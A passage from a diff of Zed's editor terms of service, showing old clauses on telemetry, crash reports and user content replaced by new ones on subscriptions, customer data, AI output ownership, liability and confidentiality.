Software or Service may be covered by open source licenses ("**Open Source Component**"), including but not limited to Apache License, Version 2.0, GNU General Public License v3.0, and the GNU Affero General Public License v3.0. To the extent required by such open source license for the applicable Open Source Component, the terms of such license will apply to such Open Source Component in lieu of the relevant provisions of these Terms. If such open source license prohibits any of the restrictions in these Terms, such restrictions will not apply to such Open Source Component. Zed shall provide Customer with a list of Open Source Components upon Customer's request. -To the extent You elect to make Customer Data available to Zed, the same may only be used by Zed according to the Customer Data type and the use rights regarding the same as described herein: +## 3. General Payment Terms -#### 3.3.2. Usage Data +Accessing certain features and tiers of the Service requires Customer to pay fees. Before Customer pays any fees, Customer will have an opportunity to review and accept the fees that Customer will be charged. Unless otherwise specifically provided for in these Terms, all fees are in U.S. Dollars and are non-refundable, except as required by law. -To improve the Editor and understand how You use it, Zed optionally collects the following usage data: +### 3.1. Price -- (a) file extensions of opened files; -- (b) features and tools You use within the Editor; -- (c) project statistics (e.g., number of files); and -- (d) frameworks detected in Your projects +Zed reserves the right to determine pricing for the Service. Zed will make reasonable efforts to keep pricing information published on our pricing page at [https://zed.dev/pricing](https://zed.dev/pricing) up to date. Zed encourages Customer to check Zed’s pricing page periodically for current pricing information. Zed may change the fees for any feature of the Service, including by adding fees or charges, if Zed gives Customer advance notice of changes before they apply. -(a-d collectively, "Usage Data"). Usage Data does not include any of Your software code or sensitive project details. You may change Your preferences disabling the collection of Usage Data and You can audit Usage Data collected by the Editor at any time. See [https://zed.dev/docs/telemetry](https://zed.dev/docs/telemetry) for more. +### 3.2. Taxes -Usage Data is associated with a secure random telemetry ID which may be linked to Your email address. This linkage currently serves two purposes: (1) it allows Zed to analyze usage patterns over time while maintaining Your privacy; and (2) it enables Zed to reach out to specific user groups for feedback and improvement suggestions. Zed may contact You based on Your usage patterns to better understand your needs and improve the Solution. If You delete Your account, the link between Your telemetry ID and Your email address will be permanently removed. By continuing to use Editor or Solution with this feature enabled You agree to this Usage Data collection. +Customer is responsible for any sales, use, GST, value-added, withholding, or similar taxes or levies that apply to Orders, whether domestic or foreign, other than Zed’s income tax (“**Taxes**”). Fees are exclusive of all Taxes. If Customer is compelled to make a deduction or set-off for any such Taxes, Customer will pay Zed such additional amounts as necessary to ensure receipt by Zed of the full amount Zed would have received but for the deduction. -#### 3.3.3. Crash Reports +### 3.3. Authorization -Customer Data consisting of data related to the behavior of the Solution prior to a crash or failure, such as stack traces are collected and classified as "Crash Reports". Zed will use commercially reasonable efforts to exclude any personally identifiable information from Crash Reports, but due to the nature of a crash, Zed does not ensure that information such as paths will be excluded from Crash Reports. Crash Reports will be used solely for Zed's internal purposes in connection with diagnosing defects in the Solution that led to the crash. You may grant us permission to capture Crash Reports when installing or activating the Solution, and You may change Your preferences at any time in the settings feature of the Solution. Once You grant us this permission, Zed will retain the Crash Reports indefinitely. +Customer authorizes Zed to charge all sums for the orders that Customer makes, the level of Service that Customer selects, and Customer’s submission of prompts or other Customer Data (defined below) to the Service to generate Output (defined below) as described in these Terms or published by Zed, including all applicable taxes, to the payment method specified in Customer’s account. If Customer pays any fees with a credit card, then Zed may seek pre-authorization of Customer’s credit card account prior to Customer’s purchase to verify that the credit card is valid and has the necessary funds or credit available to cover Customer’s purchase. -#### 3.3.4. User Content +### 3.4. Subscription Service -• You may access, modify or create certain data or information in connection with your access or use of the Zed Editor or the Solution. Such data and information may include, but is not limited to any of the following: +The Service may include certain subscription-based plans with automatically recurring payments for periodic charges ("**Subscription Service**"). The "**Subscription Billing Date**" is the date when Customer purchases its first subscription to the Service. The Subscription Service will begin on the Subscription Billing Date and continue for the subscription period that Customer selects on its account (such period, the "**Initial Subscription Period**"), and will automatically renew for successive periods of the same duration as the Initial Subscription Period (the Initial Subscription Period and each such renewal period, each a "**Subscription Period**") unless Customer cancels the Subscription Service or Zed terminates it. If Customer activates a Subscription Service, then Customer authorizes Zed or its third-party payment processors to periodically charge, on a going-forward basis and until cancellation of the Subscription Service, all accrued sums on or before the payment due date. For information on the "Subscription Fee", please see Zed’s pricing page at [https://zed.dev/pricing](https://zed.dev/pricing). Customer’s account will be charged automatically on the Subscription Billing Date and thereafter on the renewal date of its Subscription Service for all applicable fees and taxes for the next Subscription Period. Customer must cancel its Subscription Service before it renews in order to avoid billing of the next periodic Subscription Fee to Customer’s account. Zed or its third-party payment processor will bill the periodic Subscription Fee to the payment method associated with Customer’s account or that Customer otherwise provides to Zed. Customer may cancel the Subscription Service from the account page at https://zed.dev/account or by contacting us at [billing-support@zed.dev](mailto:billing-support@zed.dev). **YOUR CANCELLATION MUST BE RECEIVED BEFORE THE RENEWAL DATE IN ORDER TO AVOID BEING CHARGED FOR THE NEXT SUBSCRIPTION PERIOD.** -- (a) file contents and associated metadata (e.g., filename, paths, size, timestamps); -- (b) source control history, comments and metadata (e.g., git history, commit messages); -- (c) configuration data (e.g., settings, keymaps); -- (d) anything typed, pasted and/or displayed on screen while using the Editor; -- (e) derivative works of the above generated by the Editor (e.g., format conversions, summaries, indexes, caches); -- (f) metadata, code and other derivative works of the above returned by language servers and other local tooling; and -- (g) metadata, code and other derivative works of the above returned by services integrated with the Zed Editor +### 3.5. Consumption Fees -(a-g collectively, "User Content"). +Customer’s subscription to the Service may permit Customer to submit prompts or other Customer Data for the purpose of generating Output, at no additional charge for a certain number of times each month. If Customer elects to submit a volume of prompts in excess of the quantity included in its Subscription Fee, then Customer authorizes Zed to charge, and Customer will be charged, a fee for each additional prompt at the rates set forth at [https://zed.dev/docs/ai/models](https://zed.dev/docs/ai/models). -#### 3.3.5. Handling of User Content +### 3.6. Delinquent Accounts -Zed will make use of or transfer User Content only as specified in this Agreement, or as necessary to comply with applicable law. +Zed may suspend or terminate access to the Service, including fee-based portions of the Service, for any account for which any amount is due but unpaid. In addition to the amount due for the Service, a delinquent account will be charged with fees or charges that are incidental to any chargeback or collection of any unpaid amount, including collection fees. If your payment method is no longer valid at the time a renewal Subscription Fee is due, then Zed reserves the right to delete your account and any information or Customer Data associated with your account without any liability to Customer. -#### 3.3.5.1. Zed Collaboration Services +## 4. Data -When using Zed Collaboration Services, User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor. Once You share a project, Zed may transmit User Content consisting of file paths, file contents, and metadata regarding the code returned by language servers. Currently, Zed does not persist any User Content beyond the Your collaboration session. If You unshare a project or disconnect from the Solution, all information associated with such project will be deleted from Zed servers. In the future, Zed may save User Content regarding projects beyond the scope of a single collaboration session. We may share such User Content with those users You elected to grant access to. Zed's access to such User Content is limited to debugging and making improvements to the Solution. +### 4.1. Zed's Use of Customer Data -#### 3.3.5.2. Other Services +Customer hereby grants Zed a non-exclusive, worldwide, royalty-free, fully paid-up, non-sublicensable (except to service providers and Customer’s designees), non-transferable (except as set forth in Section 15.1) right to use, copy, store, disclose, transmit, transfer, display, modify, create derivative works from, collect, access, store, host, or otherwise process (“**Process**”) any materials that Customer inputs into or otherwise makes available to the Service (including prompts and other written content) (collectively, “**Customer Data**”) solely: (a) to perform its obligations set forth in the Terms, including its Support obligations as applicable; (b) to derive and generate Telemetry (see Section 4.4); and (c) as necessary to comply with applicable Laws. Except as required by applicable Laws, Zed will not provide Customer Data to any person or entity other than Customer’s designees (including pursuant to Section 7) or service providers. In the event that autocomplete suggestions are turned on, Customer understands and agrees that the Service will periodically send Customer Data in the background to an AI Provider for the purpose of generating autocomplete input suggestions in the Services. Autocomplete features can be turned off at any time, in which case Customer Data will not be sent. -The Zed Editor supports integration with API-based services maintained and not operated by Zed (the "Other Services"). By way of example, Other Services includes those made available by GitHub, Anthropic, OpenAI, and similar providers, or those You host or manage directly. You may configure the Zed Editor to interoperate, communicate with, and exchange data (including User Content) directly with the Other Services. Zed is not responsible or otherwise liable with respect to Your use of any Other Service, including but not limited to the exchange of data between the Other Service and the Zed Editor. The terms and conditions, including the applicable privacy policy, with respect to the Other Service are those made available by the applicable Other Service, not these Terms. +### 4.2. Customer's Ownership of Output -#### 3.3.5.3. Zed AI Services +The Service may generate specifically for, and make available to, Customer text and written content based on or in response to Customer Data input into the Service (collectively, “**Output**”), including through the use of technologies that incorporate or rely upon artificial intelligence, machine learning techniques, and other similar technology and features. As between the Parties, to the greatest extent permitted by applicable Laws, Customer owns all Output and Zed hereby irrevocably assigns to Customer all right, title, and interest in and to the Output that Zed may possess. **For the avoidance of doubt, Zed and its AI Providers will not retain or use Customer Data for the purpose of improving or training the Service or any AI Provider products, except to the extent Customer explicitly opts-in on Zed’s specific feature to allow training and/or such improvement (such as fine-tuning) and is solely for the benefit of Customer.** -The Zed Editor supports integration with API-based services maintained and operated by Zed (the "Zed AI Services"). You may elect to use Zed AI Services as the provider for various Zed Editor features (e.g., Agent Panel, Inline Assistant, Edit Predictions, and similar features). In connection with Your use of these features, the Zed Editor and Zed AI Services may make use of User Content to generate contextually relevant responses (the “Output”). Other than as specified in Section 3.3.5.4 of these Terms, Zed will not use User Content for training of its models, or disclose User Content. +### 4.3. Zed's Collection of Output Rating -Output is provided "as is" without any warranties or guarantees of functionality, security, or fitness for a particular purpose. While efforts are made to ensure the accuracy and reliability, Output may include errors, vulnerabilities, and defects. You are responsible for reviewing, testing, and validating Output before use in any production or critical environment. Zed assumes no liability for any damages, losses, or liability arising from the use, modification, reliance on, or deployment of Output. Any such use is at Your own risk. +The Service may enable Customer, at its option, to rate or otherwise provide feedback with respect to Output generated through the Service. If Customer opts in to provide feedback concerning Output using the features of the Software or Service (e.g., by clicking an Output rating button), then Customer agrees that Zed may Process that Output and associated Customer Data for the purpose of product development and improvement (“Output Rating”). For clarity, Customer’s decision to opt in to provide Output Rating is specific to the corresponding Output. Your decision to provide Output Rating with respect to one instance of Output does not give Zed the right to use any other Output for Output Rating purposes. -#### 3.3.5.4. Improvement Feedback +### 4.4. Telemetry -When using Zed AI Services to provide Edit Predictions in connection with certain open source software projects, You may elect to share requests, responses and feedback comments (collectively "Model Improvement Feedback") with Zed, and Zed may use the same to improve Zed Edit Predictions models. You may opt-out of sharing Model Improvement Feedback at any time. +Zed may collect, generate, and Process information, including technical logs, metrics, and data and learnings, related to the Software and Service (“**Telemetry**”) to improve and support the Services and for other lawful business purposes. Customer may configure the Software to opt out of the collection of certain Telemetry Processed locally by the Software itself, but Zed may still collect, generate, and Process Telemetry on Zed’s servers. Zed may not disclose Telemetry to any third-party other than Zed’s Representatives unless it is de-identified so that it does not identify Customer as the source thereof and is aggregated with data across other customers. **For avoidance of doubt, Telemetry expressly does not include Customer Data.** -For more information on Zed Edit Predictions please see: [https://zed.dev/docs/ai/ai-improvement](https://zed.dev/docs/ai/ai-improvement) +## 5. Customer Obligations -When using Zed AI Services in connection with the Agent Panel, You may elect to share with Zed requests, responses and feedback regarding the Agent Panel and related Output (the “Agent Improvement Feedback”) with Zed, and Zed may use the same to improve the Agent Panel and related Output. Zed will only collect Agent Improvement Feedback when You elect to share the same. +Customer is responsible for its Customer Data and will comply with applicable Laws when using the Service. Customer represents and warrants that it has obtained all rights, consents, and permissions necessary for Zed to Process Customer Data and exercise the rights granted to it in the Terms without violating or infringing Laws or third-party rights. Customer Data shall not contain: (a) any “protected health information” or “PHI” as defined under HIPAA (including 45 C.F.R. Parts 160 and 164); or (b) any payment card or cardholder data subject to PCI DSS (including primary account numbers, full track or chip data, CVV/CVC codes, PINs, or similar payment card security data). Customer is solely responsible for ensuring compliance with this restriction and shall be liable for, and shall indemnify Zed against, any claims, fines, or penalties arising from Customer’s breach of this Section. Zed disclaims any and all liability in connection with Customer Data. -For more information regarding the Agent Panel please see: [https://zed.dev/docs/ai/ai-improvement](https://zed.dev/docs/ai/ai-improvement) +## 6. Suspension of Service -#### 3.4. Privacy Policy +Zed may immediately suspend Customer’s access to any or all of the Service if: (a) Customer breaches Section 2.2 - 2.4 or Section 5; (b) any payments required under the Terms are overdue by 30 days or more; (c) changes to Laws or new Laws require that Zed suspend the Service or otherwise may impose additional liability on Zed in connection with its provision of the Service to Customer; or (d) Customer’s breach of the Terms risks harm to any of Zed’s other customers or the security, availability, or integrity of the Service or other services and entities. Where practicable, Zed will use reasonable efforts to provide Customer with prior notice of the suspension (email sufficing). If the issue that led to the suspension is resolved, Zed will restore Customer’s access to the Service. -You and Zed are bound by the terms and conditions contained in the Zed Privacy Policy which is incorporated by reference hereto. The Zed Privacy Policy is available at the following URL: [https://zed.dev/privacy-policy](https://zed.dev/privacy-policy). +## 7. Data Sharing and Third-Party Integrations -## 4. FEE BASED SERVICES, FEES AND PAYMENT TERMS +### 7.1. Collaboration Services -### 4.1. Fee Based Services +Certain features of the Service may allow Customer to share data between accounts on the Service, including accounts controlled by persons and entities not associated with Customer (“**Collaboration Features**”). If Customer elects to use Collaboration Features, Customer acknowledges and agrees that Zed will, and authorizes Zed to, make available Customer Data consisting of file paths, file contents, and metadata regarding the code returned by language servers to the third parties designated by Customer, and that Zed exercises no control over, and has no liability for, the acts or omissions of such third parties (including in connection with the Customer Data). Currently, with the exception of the Channel notes feature, Zed does not persist any shared Customer Data beyond the designated Collaboration Feature session. -The Zed AI Services is made available with additional usage benefits (the “Enhanced Use ”) as described in the table published at [zed.dev/pricing](https://zed.dev/pricing) (the “Pricing Table”), subject to the requirements and limitations set forth in the Pricing Table and these Terms. In order to make use of the Enhanced Use, Customer must access the Zed AI Services through a Zed registered account. +### 7.2. Third-Party Integrations -### 4.2. Fees +The Service may support integration with third-party platforms, add-ons, services, or products not provided by Zed (“**Third-Party Platforms**”). Use of any Third-Party Platforms integrated with or made available through the Service is subject to Customer’s agreement with the relevant provider and not these Terms. Zed does not control and has no liability for Third-Party Platforms, including their security, functionality, operation, availability, or interoperability with the Service. By enabling a Third-Party Platform to interact with the Service, Customer authorizes Zed to access and exchange Customer Data with such Third-Party Platform on Customer’s behalf. -Customer shall pay to Zed the applicable fees set forth in Pricing Table, together with any applicable taxes and shipping and handling (collectively, the “Fees”). Customer shall have no right of return, and all Fees shall be non-refundable. +## 8. Disclaimers; No Warranties by Zed -### 4.3. Payment Terms +THE SOFTWARE, SERVICE, OUTPUT, AND ALL OTHER ZED SERVICES ARE PROVIDED “AS IS” AND “AS AVAILABLE”. ZED, ON ITS OWN BEHALF AND ON BEHALF OF ITS SUPPLIERS AND LICENSORS, MAKES NO OTHER WARRANTIES, WHETHER EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE, INCLUDING WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, OR NONINFRINGEMENT. ZED DOES NOT WARRANT THAT CUSTOMER’S USE OF THE SOFTWARE OR SERVICE WILL BE UNINTERRUPTED OR ERROR-FREE OR THAT IT WILL MAINTAIN CUSTOMER DATA WITHOUT LOSS. ZED IS NOT LIABLE FOR DELAYS, FAILURES, OR PROBLEMS INHERENT IN USE OF THE INTERNET AND ELECTRONIC COMMUNICATIONS OR OTHER SYSTEMS OUTSIDE OF ZED’S CONTROL. ZED IS NOT RESPONSIBLE FOR ANY DAMAGE THAT MAY RESULT FROM THE SOFTWARE OR SERVICE OR OUTPUT OR CUSTOMER’S DEALING WITH ANY OTHER SERVICE USER. Without limiting the foregoing, Customer acknowledges and agrees that: (a) the Service may produce inaccurate or erroneous Output; (b) Customer is responsible for independently evaluating the Output and any other information Customer receives from the Service; and (c) due to the nature of the Service and artificial intelligence technologies generally, Output may not be unique and other users of the Service may receive output from the Service that is similar or identical to the Output (and, notwithstanding anything to the contrary, such similar or identical output will not be understood to be Output). -All amounts payable to Zed under this Agreement shall be paid in United States dollars and paid Zed according to the method of payment, frequency and calculated as set forth in the Pricing Table. +THE LIMITATIONS, EXCLUSIONS AND DISCLAIMERS IN THIS SECTION 8 (DISCLAIMERS; NO WARRANTIES BY ZED) APPLY TO THE FULLEST EXTENT PERMITTED BY LAW. Zed does not disclaim any warranty or other right that Zed is prohibited from disclaiming under applicable law. -### 4.4. Taxes; Set-offs +## 9. Term, Termination, and Modification of the Service -Any and all payments made by Customer in accordance with this Agreement are exclusive of any taxes that might be assessed by any jurisdiction. Customer shall pay or reimburse Zed for all sales, use, property and similar taxes; all customs duties, import fees, stamp duties, license fees and similar charges; and all other mandatory payments to government agencies of whatever kind, except taxes imposed on the net or gross income of Zed. All amounts payable to Zed under this Agreement shall be without set-off and without deduction of any taxes, levies, imposts, charges, withholdings and/or duties of any nature which may be levied or imposed, including without limitation, value added tax, customs duty and withholding tax. +### 9.1. Term -## 5. TERM AND TERMINATION +These Terms are effective beginning when Customer accepts the Terms or first downloads, installs, accesses, or uses the Service, and ending when terminated as described in Section 9.2 (Termination). -### 5.1. Term +### 9.2. Termination -The term of this Agreement shall commence on the date You first download the Editor or use the Zed Service (the "Effective Date"), and unless terminated earlier according to this Section 3, will end pursuant to this Section 5 (the "Term"). +If Customer violates any provision of these Terms, then Customer is not authorized to access the Service and these Terms automatically terminate. In addition, Zed may, at its sole discretion, terminate these Terms or Customer’s account on the Service, or suspend or terminate Customer’s access to the Service, at any time for any reason or no reason, with or without notice, and without any liability to Customer arising from such termination. Customer may terminate its account and these Terms at any time by contacting Zed at [hi@zed.dev](mailto:hi@zed.dev). -### 5.2. Termination +### 9.3. Effect of Termination -This Agreement may be terminated: (a) by either party if the other has materially breached this Agreement; or (b) by Zed at any time and for any reason upon notice to Customer. You acknowledge that Zed is under no obligation to continue to operate the Zed Service or make the Editor available, and We may end any programs in connection with the same at any time. +Upon termination of these Terms: a) Customer’s license to access and use the Service will terminate and Customer must immediately cease all use of the Service; b) Customer will no longer be authorized to access its account or the Service; c) Customer must pay Zed any unpaid amount that was due prior to termination; and d) all payment obligations accrued prior to termination and Section(s) 2.4 (Restrictions), 3 (General Payment Terms) with the exception of 3.4 (Subscription Service), 4.2 (Customer’s Ownership of Output), 4.4 (Telemetry), 8 (Disclaimers; No Warranties by Zed), 9.3 (Effect of Termination), 10 (Ownership; Feedback), 11 (Limitations of Liability), 12 (Indemnity), 15 (Governing Law, Dispute Resolution and Arbitration); and 16 (General Terms), will survive. If Customer’s account has been terminated for a breach of these Terms, then Customer is prohibited from creating a new account on the Service. -### 5.3. Effect of Termination and Survival +### 9.4. Modification of the Service -Upon any expiration or termination of this Agreement, Customer shall (i) immediately cease use of the Zed Service, and (ii) return all Zed Confidential Information and other materials provided by Zed. The following provisions will survive termination of this Agreement: Sections 3.3 (Customer Data), Section 3.4 (Privacy Policy), Section 5.3 (Effect of Termination and Survival), Section 6 (Ownership), Section 7 (Indemnification), Section 9 (Limitation of Liability), Section 10 (Third Party Services), and Section 11 (Miscellaneous). +Zed reserves the right to modify or discontinue all or any portion of the Service at any time (including by limiting or discontinuing certain features of the Service), temporarily or permanently, without notice to Customer. Zed will have no liability to Customer for any change to the Service. -## 6. OWNERSHIP +## 10. Ownership; Feedback -Zed retains all right, title, and interest in and to the Zed Service, Editor, and any software, products, works or other intellectual property created, used, provided, or made available by Zed under or in connection with the Zed Service or Editor. Customer may from time to time provide suggestions, comments, or other feedback to Zed with respect to the Zed Service or Editor ("Feedback"). Customer shall, and hereby does, grant to Zed a nonexclusive, worldwide, perpetual, irrevocable, transferable, sublicensable, royalty-free, fully paid-up license to use and exploit the Feedback for any purpose. You retain all right, title and interest in and to the Customer Data, including all intellectual property rights therein. No intellectual property rights with respect to any software code you develop or modify with the Editor or Zed Service (collectively, the “Output”) are transferred or assigned to Zed hereunder. +Neither Party grants the other Party any rights or licenses not expressly set out in the Terms. Except as expressly provided in the Terms, as between the Parties, Customer retains all intellectual property rights and other rights in and to the Customer Data and Output. Except for the rights and licenses granted in the Terms, Zed and its licensors retain all intellectual property rights in and to the Service and Software. To the extent Customer provides Zed with feedback (including suggestions and comments for enhancements or new functionality) regarding the Service or Software, Output, or Zed’s products, services, or other technology (“**Feedback**”), Zed has the full and unrestricted right (but no obligation) to use or incorporate Feedback in any manner, including to improve and develop any of its products, services, technology, or other materials without attribution to Customer. -## 7. INDEMNIFICATION +## 11. Limitations of Liability -Customer will defend, indemnify, and hold Zed, its affiliates, suppliers and licensors harmless and each of their respective officers, directors, employees and representatives from and against any claims, damages, losses, liabilities, costs, and expenses (including reasonable attorneys' fees) arising out of or relating to any third party claim with respect to: (a) Customer Data; (b) breach of this Agreement or violation of applicable law by Customer; or (c) alleged infringement or misappropriation of third-party's intellectual property rights resulting from Customer Data. +### 11.1. -## 8. WARRANTY +TO THE FULLEST EXTENT PERMITTED BY LAW, IN NO EVENT WILL THE ZED ENTITIES BE LIABLE TO CUSTOMER FOR ANY INDIRECT, INCIDENTAL, SPECIAL, CONSEQUENTIAL, OR PUNITIVE DAMAGES (INCLUDING DAMAGES FOR LOSS OF PROFITS, GOODWILL, OR ANY OTHER INTANGIBLE LOSS) ARISING OUT OF OR RELATING TO YOUR ACCESS TO OR USE OF, OR YOUR INABILITY TO ACCESS OR USE, THE SERVICE OR ANY MATERIALS OR CONTENT ON THE SERVICE, WHETHER BASED ON WARRANTY, CONTRACT, TORT (INCLUDING NEGLIGENCE), STATUTE, OR ANY OTHER LEGAL THEORY, AND WHETHER OR NOT ANY ZED ENTITY HAS BEEN INFORMED OF THE POSSIBILITY OF DAMAGE. -Zed does not represent or warrant that the operation of the Zed Service or Editor (or any portion thereof) will be uninterrupted or error free, or that the Zed Service or Editor (or any portion thereof) will operate in combination with other hardware, software, systems or data not provided by Zed. CUSTOMER ACKNOWLEDGES THAT, ZED MAKES NO EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES OF ANY KIND WITH RESPECT TO THE SERVICE OR SOFTWARE, OR THEIR CONDITION. ZED HEREBY EXPRESSLY EXCLUDES, ANY AND ALL OTHER EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES, WHETHER UNDER COMMON LAW, STATUTE OR OTHERWISE, INCLUDING WITHOUT LIMITATION ANY AND ALL WARRANTIES AS TO MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, SATISFACTORY QUALITY OR NON-INFRINGEMENT OF THIRD-PARTY RIGHTS. +### 11.2. -## 9. LIMITATIONS OF LIABILITY +TO THE FULLEST EXTENT PERMITTED BY LAW, THE AGGREGATE LIABILITY OF THE ZED ENTITIES TO CUSTOMER FOR ALL CLAIMS ARISING OUT OF OR RELATING TO THE USE OF OR ANY INABILITY TO USE ANY PORTION OF THE SERVICE, OR OTHERWISE ARISING UNDER THESE TERMS, WHETHER IN CONTRACT, TORT, OR OTHERWISE, IS LIMITED TO THE GREATER OF:  THE AMOUNT CUSTOMER HAS PAID TO ZED FOR ACCESS TO AND USE OF THE SERVICE IN THE 12 MONTHS PRIOR TO THE EVENT OR CIRCUMSTANCE GIVING RISE TO THE CLAIM OR US$100. -IN NO EVENT SHALL ZED BE LIABLE FOR ANY LOST DATA, LOST PROFITS, BUSINESS INTERRUPTION, REPLACEMENT SERVICE OR OTHER SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR INDIRECT DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THEORY OF LIABILITY. ZED'S LIABILITY FOR ALL CLAIMS ARISING UNDER THIS AGREEMENT, WHETHER IN CONTRACT, TORT OR OTHERWISE, SHALL NOT EXCEED THE GREATER OF: THE FEES PAID TO ZED BY CUSTOMER DURING THE TWELVE (12) MONTH PERIOD PRECEDING THE DATE OF THE CLAIM, OR ONE THOUSAND US DOLLARS ($1,000). +### 11.3. -## 10. Third Party Services +EACH PROVISION OF THESE TERMS THAT PROVIDES FOR A LIMITATION OF LIABILITY, DISCLAIMER OF WARRANTIES, OR EXCLUSION OF DAMAGES IS INTENDED TO AND DOES ALLOCATE THE RISKS BETWEEN THE PARTIES UNDER THESE TERMS. THIS ALLOCATION IS AN ESSENTIAL ELEMENT OF THE BASIS OF THE BARGAIN BETWEEN THE PARTIES. EACH OF THESE PROVISIONS IS SEVERABLE AND INDEPENDENT OF ALL OTHER PROVISIONS OF THESE TERMS. THE LIMITATIONS IN THIS SECTION 11 (LIMITATION OF LIABILITY) WILL APPLY EVEN IF ANY LIMITED REMEDY FAILS OF ITS ESSENTIAL PURPOSE. -Zed may make certain third party services available to You within the Editor or the Zed Service (each a "Third Party Service"). You acknowledge and agree that (a) use of each Third Party Service is subject to the corresponding terms and conditions available at the following URL: [https://zed.dev/third-party-terms](https://zed.dev/third-party-terms) and/or presented in connection with Your use of such Third Party Service; (b) the terms and conditions of this Agreement do not apply with respect to Your use of any Third Party Service; and (c) Zed is not liable in any way regarding Your use of any Third Party Service. +## 12. Indemnity -## 11. MISCELLANEOUS +To the fullest extent permitted by law, Customer is responsible for its use of the Service, and Customer will defend and indemnify Zed, its affiliates, and their respective shareholders, directors, managers, members, officers, employees, consultants, and agents (together, the "Zed Entities") from and against every claim brought by a third party, and any related liability, damage, loss, and expense, including attorneys' fees and costs, arising out of or connected with: (1) Customer’s unauthorized use of, or misuse of, the Service; (2) the Customer Data; (3) Customer’s use of Output; (4) Customer’s violation or alleged violation of any portion of these Terms, any representation, warranty, or agreement referenced in these Terms, or any applicable law or regulation; (5) Customer’s violation or alleged violation of any third-party right, including any intellectual property right or publicity, confidentiality, other property, or privacy right; or (6) any dispute or issue between Customer and any third party. Zed reserves the right, at Zed’s own expense, to assume the exclusive defense and control of any matter otherwise subject to indemnification by Customer (without limiting Customer’s indemnification obligations with respect to that matter), and in that case, Customer agrees to cooperate with our defense of those claims. -### 11.1. Export Control +## 13. Confidentiality -You hereby certify that You will comply with all current US Export Control laws. You agree to defend, indemnify and hold Zed harmless from any liability for Your violation of U.S. Export Control laws. +### 13.1. Definition -### 11.2. Compliance with Laws +“**Confidential Information**” means information disclosed to the receiving Party (“**Recipient**”) under the Terms that is designated by the disclosing Party (“**Discloser**”) as proprietary or confidential or that should be reasonably understood to be proprietary or confidential due to its nature and the circumstances of its disclosure. Zed’s Confidential Information includes the terms and conditions of the Terms and the Service (including any technical or performance information about the Service). -You shall comply with all applicable laws and regulations in its use of the Solution, including without limitation the unlawful gathering or collecting, or assisting in the gathering or collecting of information in violation of any privacy laws or regulations. You shall, at its own expense, defend, indemnify and hold harmless Zed from and against any and all claims, losses, liabilities, damages, judgments, government or federal sanctions, costs and expenses (including attorneys' fees) incurred by Zed arising from any claim or assertion by any third party of violation of privacy laws or regulations by You or any of its agents, officers, directors or employees. +### 13.2. Obligations -### 11.3. Assignment +As Recipient, each Party will: (a) hold Confidential Information in confidence and not disclose it to third parties except as permitted in the Terms, including Section 4.1; and (b) only use Confidential Information to fulfill its obligations and exercise its rights under the Terms. Recipient may disclose Confidential Information to its employees, agents, contractors, and other representatives having a legitimate need to know (including, for Zed, the subcontractors referenced in Section 16.5) (“**Representatives**”), provided Recipient remains responsible for its respective Representatives’ compliance with this Section 13 and such Representatives are bound by written agreements (or, in the case of professional advisers like attorneys and accountants, ethical duties) imposing confidentiality and non-use obligations no less protective than this Section 13. -Neither party may transfer and assign its rights and obligations under this Agreement without the prior written consent of the other party. Notwithstanding the foregoing, Zed may transfer and assign its rights under this Agreement without consent from the other party in connection with a change in control, acquisition or sale of all or substantially all of its assets. +### 13.3. Exclusions -### 11.4. Force Majeure +These confidentiality obligations do not apply to information that Recipient can document: (a) is or becomes public knowledge through no fault of Recipient or its Representatives; (b) it rightfully knew or possessed prior to receipt under the Terms; (c) it rightfully received from a third party without breach of confidentiality obligations; or (d) it independently developed without using Confidential Information. -Neither party shall be responsible for failure or delay in performance by events out of their reasonable control, including but not limited to, acts of God, Internet outage, terrorism, war, fires, earthquakes and other disasters (each a "Force Majeure"). Notwithstanding the foregoing: if a Force Majeure continues for more than thirty (30) days, either party may to terminate this agreement by written notice to the other party. +### 13.4. Remedies -### 11.5. Notice +Unauthorized use or disclosure of Confidential Information may cause substantial harm for which damages alone are an insufficient remedy. Discloser may seek appropriate equitable relief, in addition to other available remedies, for breach or threatened breach of this Section 13, without the  necessity of posting a bond or proving actual damages. -All notices between the parties shall be in writing and shall be deemed to have been given if personally delivered or sent by registered or certified mail (return receipt), or by recognized courier service. +### 13.5. Required Disclosures -### 11.6. No Agency +Nothing in the Terms prohibits Recipient from making disclosures, including of Customer Data and other Confidential Information, if required by Laws, subpoena, or court order, provided (if permitted by Laws) it notifies Discloser in advance and cooperates in any effort to obtain confidential treatment. -Both parties agree that no agency, partnership, joint venture, or employment is created as a result of this Agreement. You do not have any authority of any kind to bind Zed. +## 14. Publicity -### 11.7. Governing Law +Neither Party may publicly announce that the Parties have entered into the Terms, except with the other Party’s prior consent or as required by Laws. However, Zed may use the name, brand, or logo of Customer (or Customer’s parent company) for the purpose of identifying Customer as a licensee or customer on Zed’s website or in other promotional materials. Zed will cease further use at Customer’s written request. -This Agreement shall be governed exclusively by, and construed exclusively in accordance with, the laws of the United States and the State of California, without regard to its conflict of laws provisions. The federal courts of the United States in the Northern District of California and the state courts of the State of California shall have exclusive jurisdiction to adjudicate any dispute arising out of or relating to this Agreement. Each party hereby consents to the jurisdiction of such courts and waives any right it may otherwise have to challenge the appropriateness of such forums, whether on the basis of the doctrine of forum non conveniens or otherwise. The United Nations Convention on Contracts for the International Sale of Goods shall not apply to this Agreement or any Purchase Order issued under this Agreement. +## 15. Governing Law, Dispute Resolution and Arbitration -### 11.8. Updated Agreement +### 15.1. Governing Law, Jurisdiction and Venue -Zed reserves the right to update this Agreement at any time. The terms and conditions of the updated version of the Agreement shall apply to the Zed Service and Editor downloaded, or accessed following the date of publication of the updated version. If You do not agree with any terms of the updated Agreement, You may not use or access the Zed Service or Editor in any manner. Zed may from time-to-time provide release notes applicable to the Editor or Zed Service, and such release notes may contain additional use restrictions or terms applicable to Customer Data. Your use of the Editor or Zed Service after the applicable release notes are made available shall be subject to the additional use restrictions or terms applicable to Customer Data. +The Terms are governed by the laws of the State of Delaware and the United States without regard to conflicts of laws provisions that would result in the application of the laws of another jurisdiction and without regard to the United Nations Convention on the International Sale of Goods. The parties further agree that except 